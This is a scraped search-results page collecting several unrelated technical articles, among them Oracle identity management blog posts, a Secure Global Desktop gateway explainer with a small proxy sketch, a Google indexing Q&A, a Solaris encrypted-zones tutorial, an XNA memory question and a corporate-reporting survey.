Search Results

Search found 6668 results on 267 pages for 'global catalog'.


  • Partner Blog Series: PwC Perspectives Part 2 - Jumpstarting your IAM program with R2

    - by Tanu Sood
    Identity and access management (IAM) isn't a new concept. Over the past decade, companies have begun to address identity management through a variety of solutions that have primarily focused on provisioning. The new-age workforce is converging at a rapid pace, with an ever-increasing demand to use a diverse portfolio of applications and systems to interact and interface with peers in the industry and customers alike. Oracle has taken a significant leap towards enabling this global workforce to conduct its business in a secure, efficient and effective manner with the release of Identity and Access Management 11gR2. As companies deal with IAM business drivers, it becomes immediately apparent that holistic, rather than piecemeal, approaches better address their needs. When planning an enterprise-wide IAM solution, the first step is to create a common framework that serves as the foundation on which to build cost, compliance and business-process efficiencies. As a leading industry practice, IAM should be established on a foundation of accurate identity data, made available in a uniform manner to downstream applications and processes. Mature organizations are looking beyond IAM's basic benefits to harness more advanced capabilities in user lifecycle management. For any organization looking to embark on an IAM initiative, consider the following use cases in managing and administering user access.

    Expanding the Enterprise Provisioning Footprint
    Almost all organizations have some helpdesk resources tied up in handling access requests from users, a distraction from their core job of handling problem tickets. This dependency has mushroomed from the traditional acceptance of provisioning solutions integrating and addressing only a portion of applications in the heterogeneous landscape. Oracle Identity Manager (OIM) 11gR2 solves this problem by offering integration with third-party ticketing systems as "disconnected applications". It allows existing business processes to be seamlessly integrated into the system and tracked throughout their lifecycle. With minimal effort and analysis, an organization can begin integrating OIM with groups or applications that are involved with manually intensive access provisioning and de-provisioning activities. This aspect of OIM allows organizations to on-board applications and associated business processes quickly using out-of-the-box templates and frameworks. This is especially important for organizations looking to fold in users and resources from mergers and acquisitions.

    Simplifying Access Requests
    Organizations looking to implement access request solutions often find it challenging to get their users to accept and adopt the new processes. So, how do we improve the user experience, make it intuitive and personalized, and yet simplify the user access process? With R2, OIM helps organizations alleviate the challenge by placing the most-used functionality front and centre in the new user request interface. Roles, application accounts, and entitlements can all be found in the same interface as catalog items, giving business users a single location to go to whenever they need to initiate, approve or track a request. Furthermore, if a particular item is not relevant to a user's job function or area inside the organization, it can be hidden so as to not overwhelm or confuse the user with superfluous options.
    The ability to customize the user interface to suit your needs helps in exercising business rules effectively and avoiding access proliferation within the organization.

    Saving Time with Templates
    A typical use case that is most beneficial to business users is the flexibility to place, edit, and withdraw requests based on changing circumstances and business needs. With OIM R2, multiple catalog items can now be added to and removed from the shopping cart, an ecommerce paradigm that many users are already familiar with. This feature can be especially useful when setting up a large number of new employees or granting an existing department or group access to a newly integrated application. Additionally, users can create their own shopping cart templates in order to complete subsequent requests more quickly. This feature saves the user from having to search for and select items all over again if a request is similar to a previous one.

    Advanced Delegated Administration
    A key feature of any provisioning solution should be to empower each business unit to manage its own access requests. By bringing administration closer to the user, you improve user productivity, enable efficiency and alleviate administration overhead. Doing so requires a federated services model, so that business units capable of shouldering the onus of user lifecycle management for their business users can be enabled to do so. OIM 11gR2 offers advanced administrative options for creating, managing and controlling business logic and workflows through easy-to-use administrative interfaces and tools that can be exposed to delegated business administrators. For example, these business administrators can establish or modify how certain requests and operations should be handled within their business unit based on a number of attributes, ranging from the type of request to the risk level of the individual items requested.

    Closed-Loop Remediation
    Security continues to be a major concern for most organizations. Identity management solutions bolster security by ensuring only the right users have the right access to the right resources. The ability to prevent unauthorized access, and to detect and remediate it where it already exists, is a key requirement of an enterprise-grade, proven solution. But the challenge with most solutions today is that some of this information still exists in silos, and when changes are made to systems directly, not all information is captured. With R2, Oracle is offering a comprehensive identity governance solution that our customer organizations are leveraging for closed-loop remediation, giving administrators an automated way to revoke unauthorized access. The change is automatically captured and the action noted for continued management.

    Conclusion
    While implementing provisioning solutions, it is important to keep both the near-term and the long-term goals in mind. The provisioning solution should always be part of a larger security and identity management program, with the ability to integrate seamlessly with the company's infrastructure and to leverage the information and business models compiled and used by the other identity management solutions. This allows organizations to reduce the cost of ownership, close security gaps and leverage existing infrastructure. And having done so at multiple clients' sites, this is the approach we recommend.
    In our next post, we will take a journey through our experiences of advising clients looking to upgrade to R2 from a previous version or migrate from a different solution.

    Meet the Writers:
    Praveen Krishna is a Manager in the Advisory Security practice within PwC. Over the last decade Praveen has helped clients plan, architect and implement Oracle identity solutions across diverse industries. His experience includes delivering security across diverse topics like network, infrastructure, application and data, where he brings a holistic point of view to problem solving.
    Dharma Padala is a Director in the Advisory Security practice within PwC. He has been implementing medium to large scale Identity Management solutions across multiple industries including utility, health care, entertainment, retail and financial sectors. Dharma has 14 years of experience in delivering IT solutions, out of which he has been implementing Identity Management solutions for the past 8 years.
    Scott MacDonald is a Director in the Advisory Security practice within PwC. He has consulted for several clients across multiple industries including financial services, health care, automotive and retail. Scott has 10 years of experience in delivering Identity Management solutions.
    John Misczak is a member of the Advisory Security practice within PwC. He has experience implementing multiple Identity and Access Management solutions, specializing in Oracle Identity Manager and Business Process Execution Language (BPEL).
    Jenny (Xiao) Zhang is a member of the Advisory Security practice within PwC. She has consulted across multiple industries including financial services, entertainment and retail. Jenny has three years of experience in delivering IT solutions, out of which she has been implementing Identity Management solutions for the past one and a half years.

    Read the article

  • Rolling Along: PASS Board Year 2, Q2

    - by Denise McInerney
    Eighteen months into my time as a PASS Director I'm especially proud of what the Virtual Chapters have accomplished and want to share that progress with you. I'm also pleased that the organization has invested more resources to support the VCs. In this quarter I got to attend two conferences and meet more members of the SQL community.

    Virtual Chapters
    In the first six months of 2013 VCs have hosted more than 50 webinars, offering free technical education to over 6,200 attendees. This is a great benefit to PASS members; thanks to the VC leaders, volunteers and speakers who contribute their time to produce these events. The Performance VC held their "Summer Performance Palooza", an event featuring eight back-to-back sessions. Links to the session recordings can be found on the VC's web site. The new webinar platform, GoToWebinar, has been rolled out to all the VCs. This is a more stable, scalable platform and represents an important investment in the future of the VCs. A few new VCs are in the planning stages, including one focused on Security and one for Russian speakers. Visit the Virtual Chapter home page to sign up for the chapters that interest you. Each Virtual Chapter is offering a discount code for PASS Summit 2013. Be sure to ask your VC leader for the code to save $200 on Summit registration.

    24 Hours of PASS
    The next 24HOP will be on July 31. This Summit Preview edition will feature 24 consecutive webcasts presented by experts who will be speaking at Summit in October. Registration for this free event is open now, and we will be using the GoToWebinar platform for 24HOP as well.

    Business Analytics Conference
    April marked the first PASS Business Analytics Conference in Chicago. This introduced PASS to another segment of data professionals: the analysts and data scientists who work with the world's growing collection of data. Overall the inaugural event was a success and gave us a glimpse into this increasingly important space. After Chicago the Board had several serious discussions about the lessons learned from this event and what we should do next. We agreed to apply those lessons and continue to invest in this event; there will be a PASS Business Analytics Conference in 2014. I'm very pleased the next event will be in San Jose, CA, the heart of Silicon Valley, a place where a great deal of investment and innovation in data analytics is taking place.

    Global SQL Community
    Over the last couple of years PASS has been taking steps to become more relevant to SQL communities in different parts of the world. In May I had the opportunity to attend SQL Bits XI in Nottingham, England. It was enlightening to meet and talk with SQL professionals from around the U.K. as well as many other European countries. The many SQL Bits volunteers put on a great event and were gracious hosts.

    Budgets
    The Board passed the FY14 budget at the end of June. The budget process can be challenging and requires the Board to make some difficult choices about where to allocate resources. Overall I'm satisfied with the decisions we made and think we are investing in the right activities and programs.

    Next Up
    The Board is meeting July 18-19 in Kansas City. We will be holding the Executive Committee election for the Exec Co that will take office in 2014. We will also be discussing plans for the next BA conference as well as the next steps for our Global Growth initiative. Applications for the upcoming Board of Directors election open on July 24.
If you are considering running for the Board you can visit the PASS elections site to learn more about the election process. And I encourage anyone considering running to reach out to current and past Board members to learn about what the role entails. Plans for the next PASS Summit are in full swing. We are working on some fun new ideas to introduce attendees to the many ways to become involved in the SQL community.

    Read the article

  • Friday Tips #6, Part 1

    - by Chris Kawalek
    We have a two-parter this week, with this post focusing on desktop virtualization and the next one on server virtualization.

    Question: Why would I use the Oracle Secure Global Desktop Secure Gateway?

    Answer by Rick Butland, Principal Sales Consultant, Oracle Desktop Virtualization: Well, for the benefit of those who might not be familiar with client connections in Oracle Secure Global Desktop (SGD), let me back up and briefly explain. An SGD client connects to an SGD server using two distinct protocols, which, by default, require two distinct TCP ports. The first is the HTTP protocol, used by the web browser to connect to the SGD webserver on TCP port 80, or, if secure connections are enabled (SSL/TLS), then TCP port 443, commonly identified as the "HTTPS" port, that is, "SSL-encrypted HTTP." The second protocol from the client to the server is the Adaptive Internet Protocol, or AIP, which is used for displaying applications, transferring drive mapping data, print jobs, and so on. By default, AIP uses TCP port 3144, or port 5307 when SSL is enabled. When SGD clients need to access SGD over a firewall, the ports that AIP requires are typically "closed", and most administrators are reluctant, to put it mildly, to change their firewall configurations to allow AIP traffic on 3144/5307.

    To avoid this problem, SGD introduced "Firewall Forwarding", a technique where, in effect, both HTTP and AIP traffic are multiplexed onto a single well-known TCP port, that is, port 443, the HTTPS port. This is also known as single-port firewall traversal. This technique takes advantage of the fact that, as a well-known service, port 443 is usually "open", allowing (encrypted) traffic to pass. At the target SGD server, the two protocols are de-multiplexed and routed appropriately.

    The Secure Gateway was developed in response to requirements from customers for SGD to support multi-stage DMZs, and to avoid exposing SGD servers and the information they contain directly to connections from the Internet. The Secure Gateway acts as a reverse proxy in the first tier of the DMZ: accepting, authenticating, and terminating incoming client connections, then re-encrypting the connections and proxying them, routing them on to SGD servers deeper in the network. The client no longer needs to know the name/IP address of the SGD servers in the network; it connects only to the gateway, and the gateway takes care of those internal network details. The Secure Gateway supports the same single-port firewall capability as "Firewall Forwarding", but offers the additional advantage of load-balancing incoming client connections amongst SGD array members, which could be cumbersome without a forward-deployed secure gateway. Load-balancing weights and policies can be monitored and tuned using the "Balancer Manager" application and Apache mod_proxy_balancer directives.

    Going forward, our architects recommend the use of the Secure Gateway over "Firewall Forwarding" for single-port firewall traversal, due to its architectural advantages, greater flexibility and enhanced features. Finally, it should be noted that the Secure Gateway is not separately priced; any licensed SGD customer may use the Secure Gateway component at no additional cost. For more information, see the "Secure Gateway Administrator's Guide".
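
    To make the multiplexing idea concrete, here is a toy sketch of single-port traversal, not SGD's actual implementation: a single listener on port 443 peeks at the first bytes of each connection and routes HTTP-looking traffic to a web backend and everything else to a display-protocol backend. The backend addresses and ports are made up for illustration.

        import asyncio

        # Byte prefixes that mark a connection as HTTP; anything else is
        # treated as display-protocol (AIP-style) traffic in this toy example.
        HTTP_PREFIXES = (b"GET ", b"POST", b"HEAD", b"PUT ", b"OPTI", b"DELE")

        async def pump(src, dst):
            # Copy bytes one way until the source side closes.
            while True:
                data = await src.read(4096)
                if not data:
                    break
                dst.write(data)
                await dst.drain()
            dst.close()

        async def handle(reader, writer):
            first = await reader.read(4)            # peek at the opening bytes
            if first.startswith(HTTP_PREFIXES):
                backend = ("127.0.0.1", 8080)       # hypothetical web server
            else:
                backend = ("127.0.0.1", 3144)       # hypothetical AIP listener
            b_reader, b_writer = await asyncio.open_connection(*backend)
            b_writer.write(first)                   # replay the peeked bytes
            await asyncio.gather(pump(reader, b_writer), pump(b_reader, writer))

        async def main():
            # Binding port 443 normally requires privileges and a TLS layer
            # in front; both are omitted to keep the sketch short.
            server = await asyncio.start_server(handle, "0.0.0.0", 443)
            async with server:
                await server.serve_forever()

        asyncio.run(main())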

    Read the article

  • Single page not appearing in Google Search

    - by Dan
    Description

    I have a static franchise website which has various sub-pages, each dedicated to an individual franchisee. The only thing even slightly similar between the franchisee pages is the page title; the titles follow this structure:

        <title> Welcome to THE_COMPANY - PRODUCT_DESCRIPTION Services, THE_LOCATION </title>

    THE_COMPANY and PRODUCT_DESCRIPTION are the same across all franchisees; however, THE_LOCATION changes depending on where they are located in the UK. Each franchisee page has the following <meta /> tags:

        <meta name="DC.creator" content="user"/>
        <meta name="DC.format" content="text/html"/>
        <meta name="DC.language" content="en"/>
        <meta name="DC.date.modified" content="2014-01-23T11:22:31+00:00"/>
        <meta name="DC.date.created" content="2014-01-23T11:22:09+00:00"/>
        <meta name="DC.type" content="Page"/>
        <meta name="DC.distribution" content="Global"/>
        <meta name="robots" content="ALL"/>
        <meta name="distribution" content="Global"/>

    The main content on each franchisee page is completely different.

    The Problem

    There is one particular franchisee page, located in Area A, which will not appear in Google Search results at all, yet every single other franchisee is number 1 if you search Google for "THE_COMPANY, THE_LOCATION". And if I do the same search on Bing, Yahoo or DuckDuckGo, the Area A franchisee is the first result on all of them. Has Google for some reason blacklisted one page on the site?

    What I Have Tried

    Ensuring the page is referenced in my sitemap.xml file
    'Fetching as Google Bot' the link www.the_company.co.uk/areaa
    When that came back as OK I would submit to index
    Resubmitting the sitemap.xml file in Webmaster Tools
    Linking to the Area A page from another page's content
    For this I also waited about 3 weeks before checking again to give Google time to re-index
    Making a change to the page content and waiting another 2-3 weeks
    Removing the page completely and recreating it with an alternative URL

    The closest thing I have found to this issue is this StackOverflow question, but this particular franchisee has existed for almost a year; it used to appear on Google searches but no longer does. I'm guessing the Panda update wasn't too happy with something on the page, but it hasn't affected anything else on the site and I am at a loss for things to try. I would greatly appreciate any information or thoughts as to what could have caused this. Thanks.

    Update

    In line with Daniel Fukuda's answer below, I have followed some of his steps, but everything seems to check out alright:

    HTTP headers:

        HTTP/1.1 200 OK
        Date: Tue, 25 Feb 2014 16:31:29 GMT
        Server: Zope/(2.12.16, python 2.6.6, linux2) ZServer/1.1
        Content-Length: 40078
        Expires: Sat, 01 Jan 2000 00:00:00 GMT
        Content-Type: text/html;charset=utf-8
        Content-Language: en
        Vary: Accept-Encoding
        Connection: close

    Robots <meta /> tag:

        <meta name="robots" content="ALL"/>

    I have updated this <meta /> tag to read content="INDEX" instead now.

    robots.txt:

        User-agent: *
        Disallow:

        User-Agent: Googlebot
        Disallow: /*sendto_form$
        Disallow: /*folder_factories$

    Using site:THE_COMPANY.co.uk: searching for 'AREA A site:THE_COMPANY.co.uk' does not return the page, but regardless of that, searching just for site:THE_COMPANY.co.uk will not necessarily return every indexed page, or so I understand...

    Update

    It appears Google likes to drop pages from the index every now and then; despite my steps above, I left the site alone and the page reappeared in the SERPs by itself.
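
    For anyone wanting to reproduce the checks above in one go, a minimal sketch along these lines pulls the status line, any X-Robots-Tag header, and the robots meta tag for a page (the URL below is just the placeholder from the question):

        import urllib.request
        from html.parser import HTMLParser

        URL = "http://www.the_company.co.uk/areaa"  # placeholder from the question

        class RobotsMeta(HTMLParser):
            # Collects the content of a <meta name="robots" .../> tag if present.
            def __init__(self):
                super().__init__()
                self.robots = None
            def handle_starttag(self, tag, attrs):
                a = dict(attrs)
                if tag == "meta" and a.get("name", "").lower() == "robots":
                    self.robots = a.get("content")

        with urllib.request.urlopen(URL) as resp:
            print("Status:      ", resp.status)
            print("X-Robots-Tag:", resp.headers.get("X-Robots-Tag"))
            p = RobotsMeta()
            p.feed(resp.read().decode("utf-8", errors="replace"))
            print("robots meta: ", p.robots)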

    Read the article

  • Partner Blog Series: PwC Perspectives - Looking at R2 for Customer Organizations

    - by Tanu Sood
    Welcome to the first post in our partner blog series. November Mondays are all about PricewaterhouseCoopers' perspective on Identity and R2. In this series, we have identity management experts from PricewaterhouseCoopers (PwC) share their perspective on (and experiences with) the recent identity management release, Oracle Identity Management R2. The purpose of the series is to discuss real-world identity use cases that helped shape the innovations in the recent R2 release, and the implementation strategies that customers are employing today, with expertise from PwC.

    Part 1: Looking at R2 for Customer Organizations

    In this inaugural post, we will discuss some of the new features of the R2 release of Oracle Identity Manager that some of our customer organizations are implementing today, and the business rationale for them. Oracle's R2 security portfolio represents a solid step forward for a platform that is already market-leading. Prior to R2, Oracle was an industry titan in security with reliable products, expansive compatibility, and a large customer base. Oracle has taken its identity platform to the next level in its latest version, R2. The new features include a customizable UI, a request catalog, flexible security, connector enhancements, and more.

    Oracle customers will be impressed by the new Oracle Identity Manager (OIM) business-friendly UI. Without question, Oracle has invested significant time in responding to customer feedback about making access requests and related activities easier for non-IT users. The flexibility to add information to screens, hide fields that are not important to a particular customer, and adjust web themes to suit a company's preference makes Oracle Identity Manager stand out among its peers. Customers can also expect to carry UI configurations forward with minimal migration effort to future versions of OIM. Oracle's flexible UI will benefit many organizations looking for a customized feel with out-of-the-box configurations.

    Organizations looking to extend their services to end users will benefit significantly from new usability features like OIM's 'Catalog.' Customers familiar with Oracle Identity Analytics' 'Glossary' feature will be able to relate to the concept. It enables Roles, Entitlements, Accounts, and Resources to be requested through the out-of-the-box UI. This is an industry-changing feature, as customers can make the process of requesting access easier than ever. For additional ease of use, Oracle has introduced a shopping-cart-style request interface that further simplifies the experience for end users. Common requests can be set up as profiles to save time. All of this is combined with the approval workflow engine introduced in R1, which provides the flexibility customers need to meet their compliance requirements.

    Enhanced security was also on the list of features Oracle wanted to deliver to its customers. The new end-user UI provides additional granular access controls. Common help desk use cases can be implemented with ease by updating the application profiles. Access can be rolled out so that administrators can only manage a certain department or organization. Further, OIM can be more easily configured to select which fields are read-only vs. updatable. Finally, this security model can be used to limit search results for roles and entitlements intended for a particular department. Every customer has a different need for access, and OIM now matches this need with a flexible security model.
    One of the important considerations when selecting an Identity Management platform is compatibility. The number of supported platform connectors, and how well the platform can integrate with unsupported platforms, is a key consideration when selecting an identity suite. Oracle has a long list of supported connectors, and when a customer has a requirement for a platform not on that list, Oracle has a solution too. Oracle is introducing a simplified architecture called the Identity Connector Framework (ICF), which holds the potential to simplify custom connectors. Finally, Oracle has introduced a simplified process to profile new disconnected applications from the web browser. This is a useful feature that enables administrators to profile applications quickly, as well as empowering the application owner to fulfill requests from their web browser. Support will still be available in R2 for connectors based on previous versions.

    Oracle Identity Manager's new R2 version has delivered many new features customers have been asking for. Oracle has matured their platform with R2, making it a truly distinctive platform among its peers. In our next post, expect a deep dive into use cases for a customer considering R2 as their new enterprise identity solution. In the meantime, we look forward to hearing from you about the specific challenges you are facing and your experience in solving them.

    Meet the Writers
    Dharma Padala is a Director in the Advisory Security practice within PwC. He has been implementing medium to large scale Identity Management solutions across multiple industries including utility, health care, entertainment, retail and financial sectors. Dharma has 14 years of experience in delivering IT solutions, out of which he has been implementing Identity Management solutions for the past 8 years.
    Scott MacDonald is a Director in the Advisory Security practice within PwC. He has consulted for several clients across multiple industries including financial services, health care, automotive and retail. Scott has 10 years of experience in delivering Identity Management solutions.
    John Misczak is a member of the Advisory Security practice within PwC. He has experience implementing multiple Identity and Access Management solutions, specializing in Oracle Identity Manager and Business Process Execution Language (BPEL).
    Jenny (Xiao) Zhang is a member of the Advisory Security practice within PwC. She has consulted across multiple industries including financial services, entertainment and retail. Jenny has three years of experience in delivering IT solutions, out of which she has been implementing Identity Management solutions for the past one and a half years.
    Praveen Krishna is a Manager in the Advisory Security practice within PwC. Over the last decade Praveen has helped clients plan, architect and implement Oracle identity solutions across diverse industries. His experience includes delivering security across diverse topics like network, infrastructure, application and data, where he brings a holistic point of view to problem solving.

    Read the article

  • Solaris 11.1: Encrypted Immutable Zones on (ZFS) Shared Storage

    - by darrenm
    Solaris 11 brought both ZFS encryption and the Immutable Zones feature, and I've talked about the combination in the past. Solaris 11.1 adds a fully supported method of storing zones in their own ZFS pool on shared storage, so let's update things a little and put all three parts together.

    When using an iSCSI (or other supported) shared storage target for a zone, we can either let the Zones framework set up the ZFS pool or we can do it manually beforehand and tell the Zones framework to use the one we made earlier. To enable encryption we have to take the second path, so that we can set up the pool with encryption before we start to install the zone on it.

    We start by configuring the zone and specifying a rootzpool resource:

        # zonecfg -z eizoss
        Use 'create' to begin configuring a new zone.
        zonecfg:eizoss> create
        create: Using system default template 'SYSdefault'
        zonecfg:eizoss> set zonepath=/zones/eizoss
        zonecfg:eizoss> set file-mac-profile=fixed-configuration
        zonecfg:eizoss> add rootzpool
        zonecfg:eizoss:rootzpool> add storage \
          iscsi://zs7120-tvp540-c.uk.oracle.com/luname.naa.600144f09acaacd20000508e64a70001
        zonecfg:eizoss:rootzpool> end
        zonecfg:eizoss> verify
        zonecfg:eizoss> commit
        zonecfg:eizoss>

    Now let's create the pool and specify encryption:

        # suriadm map \
          iscsi://zs7120-tvp540-c.uk.oracle.com/luname.naa.600144f09acaacd20000508e64a70001
        PROPERTY    VALUE
        mapped-dev  /dev/dsk/c10t600144F09ACAACD20000508E64A70001d0
        # echo "zfscrypto" > /zones/p
        # zpool create -O encryption=on -O keysource=passphrase,file:///zones/p eizoss \
          /dev/dsk/c10t600144F09ACAACD20000508E64A70001d0
        # zpool export eizoss

    Note that the keysource above is just for this example; realistically you should probably use an Oracle Key Manager or some other better key storage, but that isn't the purpose of this example. Note, however, that it does need to be one of file://, https:// or pkcs11:, and not prompt, for the key location. Also note that we exported the newly created pool. The name we used here doesn't actually matter, because it will get set properly on import anyway.

    So let's go ahead and do our install:

        zoneadm -z eizoss install -x force-zpool-import
        Configured zone storage resource(s) from:
            iscsi://zs7120-tvp540-c.uk.oracle.com/luname.naa.600144f09acaacd20000508e64a70001
        Imported zone zpool: eizoss_rpool
        Progress being logged to /var/log/zones/zoneadm.20121029T115231Z.eizoss.install
            Image: Preparing at /zones/eizoss/root.
            AI Manifest: /tmp/manifest.xml.ujaq54
            SC Profile: /usr/share/auto_install/sc_profiles/enable_sci.xml
            Zonename: eizoss
            Installation: Starting ...
            Creating IPS image
            Startup linked: 1/1 done
            Installing packages from:
                solaris
                    origin: http://pkg.us.oracle.com/solaris/release/
        Please review the licenses for the following packages post-install:
            consolidation/osnet/osnet-incorporation (automatically accepted, not displayed)
        Package licenses may be viewed using the command:
            pkg info --license <pkg_fmri>
        DOWNLOAD      PKGS        FILES     XFER (MB)   SPEED
        Completed  187/187  33575/33575   227.0/227.0  384k/s
        PHASE                         ITEMS
        Installing new actions  47449/47449
        Updating package state database     Done
        Updating image state                Done
        Creating fast lookup database       Done
        Installation: Succeeded
        Note: Man pages can be obtained by installing pkg:/system/manual
        done.
        Done: Installation completed in 929.606 seconds.
        Next Steps: Boot the zone, then log into the zone console (zlogin -C)
        to complete the configuration process.
        Log saved in non-global zone as /zones/eizoss/root/var/log/zones/zoneadm.20121029T115231Z.eizoss.install

    That was really all we had to do; when the install is done, boot it up as normal. The zone administrator has no direct access to the ZFS wrapping keys used for the encrypted pool the zone is stored on. Due to how inheritance works in ZFS, he can still create new encrypted datasets that use those wrapping keys (without them ever being inside a process in the zone), or he can create encrypted datasets inside the zone that use keys of his own choosing. The output below shows the two cases: rpool is inheriting the key material from the global zone (note that we can see the value of the keysource property, but we don't use it inside the zone, nor does that path need to be, or is, accessible inside the zone), whereas rpool/export/home/bob has set keysource locally.

        # zfs get encryption,keysource rpool rpool/export/home/bob
        NAME                   PROPERTY    VALUE                       SOURCE
        rpool                  encryption  on                          inherited from $globalzone
        rpool                  keysource   passphrase,file:///zones/p  inherited from $globalzone
        rpool/export/home/bob  encryption  on                          local
        rpool/export/home/bob  keysource   passphrase,prompt           local

    Read the article

  • Openmatics Revolutionizes Fleet Management with Standards-Based Vehicle Telematics Platform

    - by Michael Snow
    Openmatics s.r.o. was founded in 2010 as a subsidiary of ZF Friedrichshafen AG, a global player in driveline and chassis technology.

    Oracle Customer: Openmatics s.r.o.
    Location: Pilsen, Czech Republic
    Industry: Automotive
    Employees: 70

    Its goal was to develop and operate a flexible, open telematics platform for automotive applications, which is independent from vehicle and component suppliers—recognizing that the fragmented telematics market was not meeting today's fleet management needs. Openmatics provides a rich product portfolio, and customers can extend the platform, as required, to meet their needs. Partners and third parties can develop their own applications using the Openmatics software development kit and can sell them via the Openmatics app shop.

    ZF Friedrichshafen AG is a global player in driveline and chassis technology. With 121 production companies and 650 service partners in 26 countries, ZF is among the top 10 largest automotive suppliers worldwide. Founded in 1915 to develop and produce transmissions for airships and vehicles, the group's product offerings now include transmissions and steering systems as well as chassis components and complete axle systems and modules.

    A word from Openmatics s.r.o.
    "Oracle WebCenter Portal, together with the underlying Oracle Application Development Framework, provided the fundamental infrastructure for the Openmatics platform. Fleet managers can now reduce fuel consumption and operating costs, and more efficiently manage vehicle usage, maintenance, and safety. The standards-based platform allows third-party suppliers to deploy their own vehicle telematics services as Openmatics apps and creates a de facto standard for the automotive industry, independent from a single manufacturer or service provider." – Gero Strobel, Head of Development, Openmatics s.r.o.
    Challenges
    • Create an industry standard for vehicle telematics by establishing a customizable platform that enables access to telematics information, such as current and past fuel consumption, through a web browser, to better meet automotive market and customer needs
    • Reduce fleet-management costs by eliminating the need to invest in isolated telematics hardware and software solutions per vehicle brand and vehicle component manufacturer
    • Establish an open platform where third-party providers—such as original equipment manufacturers (OEM), insurers, fleet operators, and individual developers—can deploy their own vehicle telematics services
    • Allow users to purchase targeted telematics services as single apps to reduce costs and ensure rapid growth of telematics services available on the platform
    • Enable users to configure their telematics apps with ease to make sure the platform meets individual fleet management requirements, such as analyzing past and current fuel consumption of a truck fleet

    Solutions
    • Deployed Oracle WebCenter Portal as a foundation for Openmatics, a standards-based automotive telematics platform that provides next-generation fleet management with unified digital communication from and to vehicles on the move
    • Used Oracle Application Development Framework as the development framework for Oracle WebCenter Portal's components and services, providing developers with ready-to-use software development kits with application programming interfaces, design templates, and visual tools that accelerated time to market
    • Used Oracle Enterprise Pack for Eclipse to simplify telematics application development in Java
    • Enabled fleet monitoring by recording vehicle data—such as fuel consumption information—through onboard units, delivering the information to Oracle Database, and making it accessible through a customizable app portfolio on any web browser
    • Stored vehicle telematics data—sent as encrypted information—in Oracle Database, ensuring data integrity and immediate availability for the platform's telematics applications
    • Enabled a wide range of telematics services suppliers, from vehicle component manufacturers to fleet application developers, to offer vehicle telematics services on the Openmatics platform, ensuring platform independence from OEMs
    • Provided Openmatics customers with the means to individually select the automotive telematics services that are relevant to their business requirements, eliminating the need to pay for superfluous information and reducing fleet management costs

    Oracle Products & Services
    • Oracle Application Development Framework
    • Oracle WebCenter Portal
    • Oracle SOA Suite
    • Oracle Enterprise Pack for Eclipse
    • Oracle Database
    • Oracle Consulting

    Read the article

  • XNA WP7 Texture memory and ContentManager

    - by jlongstreet
    I'm trying to get my WP7 XNA game's memory under control and under the 90MB limit for submission. One target I identified was UI textures, especially fullscreen ones, that would never get unloaded. So I moved UI texture loads to their own ContentManager so I can unload them. However, this doesn't seem to affect the value of Microsoft.Phone.Info.DeviceExtendedProperties.GetValue("ApplicationCurrentMemoryUsage"), so it doesn't look like the memory is actually being released.

    Example: splash screens. In Game.LoadContent():

        Application.Instance.SetContentManager("UI"); // set the current content manager
        // load the splash textures
        for (int i = 0; i < mSplashTextures.Length; ++i)
        {
            mSplashTextures[i] = Application.Instance.Content.Load<Texture2D>(msSplashTextureNames[i]);
        }
        // set the content manager back to the global one
        Application.Instance.SetContentManager("Global");

    When the initial load is done and the title screen starts, I do:

        Application.Instance.GetContentManager("UI").Unload();

    The three textures take about 6.5 MB of memory. Before unloading the UI ContentManager, I see that ApplicationCurrentMemoryUsage is at 34.29 MB. After unloading the ContentManager (and doing a full GC.Collect()), it's still at 34.29 MB. But after that, I load another fullscreen texture (for the title screen background) and memory usage still doesn't change. Could it be keeping the memory for these textures allocated and reusing it?

    Edit: very simple test:

        protected override void LoadContent()
        {
            // Create a new SpriteBatch, which can be used to draw textures.
            spriteBatch = new SpriteBatch(GraphicsDevice);

            PrintMemUsage("Before texture load: ");

            // TODO: use this.Content to load your game content here
            red = this.Content.Load<Texture2D>("Untitled");

            PrintMemUsage("After texture load: ");
        }

        private void PrintMemUsage(string tag)
        {
            Debug.WriteLine(tag + Microsoft.Phone.Info.DeviceExtendedProperties.GetValue("ApplicationCurrentMemoryUsage"));
        }

        protected override void Update(GameTime gameTime)
        {
            // Allows the game to exit
            if (GamePad.GetState(PlayerIndex.One).Buttons.Back == ButtonState.Pressed)
                this.Exit();

            // TODO: Add your update logic here
            if (count++ == 100)
            {
                GC.Collect();
                GC.WaitForPendingFinalizers();
                PrintMemUsage("Before CM unload: ");
                this.Content.Dispose();
                GC.Collect();
                GC.WaitForPendingFinalizers();
                PrintMemUsage("After CM unload: ");
                red = null;
                spriteBatch.Dispose();
                GC.Collect();
                GC.WaitForPendingFinalizers();
                PrintMemUsage("After SpriteBatch Dispose(): ");
            }

            base.Update(gameTime);
        }

        protected override void Draw(GameTime gameTime)
        {
            GraphicsDevice.Clear(Color.CornflowerBlue);

            // TODO: Add your drawing code here
            if (red != null)
            {
                spriteBatch.Begin();
                spriteBatch.Draw(red, new Vector2(0,0), Color.White);
                spriteBatch.End();
            }

            base.Draw(gameTime);
        }

    This prints something like (it changes every time):

        Before texture load: 7532544
        After texture load: 10727424
        Before CM unload: 9875456
        After CM unload: 9953280
        After SpriteBatch Dispose(): 9953280

    Read the article

  • Challenges in Corporate Reporting - New Independent Research

    - by ndwyouell
    Earlier this year, Oracle and Accenture sponsored a global study on trends in financial close and reporting. We surveyed 1,123 finance professionals in large organizations in 12 countries around the world during February and March. Financial Consolidation and Reporting is the most mature aspect of Enterprise Performance Management, with mainstream solutions having been around for over 30 years. But of course over this time there have been many changes and very significant increases in regulation. So just what is the current state of Financial Consolidation and Reporting in our major corporations across the world? We commissioned this independent research to find out. Highlights of the results are:

    • Seeking change: Businesses recognize they need to invest in financial reporting to address the challenges they currently face. 47 percent of companies have made substantial investments over the last year in the financial close, filing, and reporting processes.
    • Ineffective investments: Despite these investments, spreadsheets (72 percent) and e-mails (68 percent) are still being used daily to track and manage reporting, suggesting that new investments are falling short of expectations.
    • Increased costs and uncertainty: The situation is so opaque that managers across the finance function are unable to fully understand the financial impact or cost implications of reporting, with 60 percent of respondents admitting they did not know the total cost of managing and publicizing their financial results.
    • Persistent challenges: 68 percent of respondents admitted that they have inadequate visibility into reporting processes, while 84 percent of finance managers surveyed said they find it difficult to control the quality of financial data across the entire reporting process.
    • Decreased effectiveness: 71 percent of finance managers feel their effectiveness is limited in some way by data-analysis-related issues, while 39 percent of C-level or VP-level respondents say their effectiveness is impaired by limited visibility.
    • Missed deadlines: Due to late changes to the chart of accounts, 15 percent of global businesses have missed statutory filings, putting their companies at risk of financial penalties and potentially impacting share value.

